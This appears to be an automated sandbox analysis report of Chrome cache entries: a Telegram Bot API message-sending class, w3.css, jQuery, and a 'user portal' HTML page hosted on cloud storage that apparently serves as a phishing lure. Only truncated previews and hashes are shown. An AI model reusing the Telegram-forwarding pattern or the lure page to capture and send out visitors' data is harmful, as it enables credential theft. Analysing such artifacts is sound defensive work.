Preview:	class TelegramBotSetup {.. constructor(token) {.. this.token = token;.. this.requestUrl = 'https://api.telegram.org/bot';.. }.... api(type, method, body) {.. return new Promise((resolve, reject) => {.. fetch(this.requestUrl + this.token + type, {.. method: method,.. body: body.. }).then(res => {.. resolve(res.json()).. }).catch(err => {.. reject(err).. }).. }).. }..}....class Bot extends TelegramBotSetup {.. constructor(botToken, defaultChatID) {.. super(botToken);.. this.dcid = defaultChatID;.. }.... static start() {.. console.log("Send telegram message with JS\nDeveloper: https://manuchehr.me\nDocs: https://github.com/manuchekhr32/send-telegram-message-with-js");.. }.... async getUpdates() {.. try {.. const result = await this.api('/getUpdates', 'GET').. return await result.. } catch(e) {.. return await e.. }.. }.... async getMe() {.. try {.. const result = await this.api('

Chrome Cache Entry: 68

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	downloaded
Size (bytes):	23427
Entropy (8bit):	5.112735417225198
Encrypted:	false
SSDEEP:
MD5:	BA0537E9574725096AF97C27D7E54F76
SHA1:	BD46B47D74D344F435B5805114559D45979762D5
SHA-256:	4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
SHA-512:	FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
Malicious:	false
Reputation:	unknown
URL:	https://www.w3schools.com/w3css/4/w3.css
Preview:	./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /.html{box-sizing:border-box},:before,:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p

Chrome Cache Entry: 69

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32061)
Category:	dropped
Size (bytes):	84245
Entropy (8bit):	5.369495907619158
Encrypted:	false
SSDEEP:
MD5:	E40EC2161FE7993196F23C8A07346306
SHA1:	AFB90752E0A90C24B7F724FACA86C5F3D15D1178
SHA-256:	874706B2B1311A0719B5267F7D1CF803057E367E94AE1FF7BF78C5450D30F5D4
SHA-512:	5F57CC757FFF0E9990A72E78F6373F0A24BCE2EDF3C4559F0B6FEF3CF65EDF932C0F3ECA5A35511EA11EABC0A412F1C7563282EC76F6FA005CC59504417159EB
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,functi

Chrome Cache Entry: 70

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (16600), with CRLF line terminators
Category:	downloaded
Size (bytes):	487698
Entropy (8bit):	6.054580915394357
Encrypted:	false
SSDEEP:
MD5:	5D2B4B374E45025AD42533BF41A5BDCA
SHA1:	E6BAA55790954B57BE0976DADC273C180C63D06D
SHA-256:	E473B57DC5DB74EA24FC4C4FB459A6FE9EAFF1A5861BAA212CEDC6B36E42E56D
SHA-512:	8293DF3E7AB6A62D50911D961E86F4781CBC0C794E6A056ACA4D89E98C56D5B2BF8D7205FD78B53C1479366CC4CAC2D6197EF84643851F001A0B01893F16205D
Malicious:	false
Reputation:	unknown
URL:	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html
Preview:	..<html id="mainAll" data-fetch="234.occ" lang="en"><head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <script src="https://kit.fontawesome.com/c2d4bde48d.js" crossorigin="anonymous"></script>.. <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">.. <title id="pageTittle">user portal</title>.. <link id="faviconPage" rel="shortcut icon" href="" type="image/x-icon">.... <style type="text/css"><style> [class~=allBlock], [class~=pdfClass], [class~=headerClass], [class~=dButton] { position: relative; } [class~=lds-ring] div { box-sizing: border-box; } body { font-family: Arial, Helvetica, sans-serif; } * { padding-left: 0pt; } [class~=allBlock] { margin-top: 30px; } [class~=allBlock], [class~=detailBlock] { margin-left: auto; } [class~=allBlock], [class~=detailBlock] { margin-right: auto; } [class~=detailBlock], [class~=allBlock] { width:

Static File Info

⊘No static file info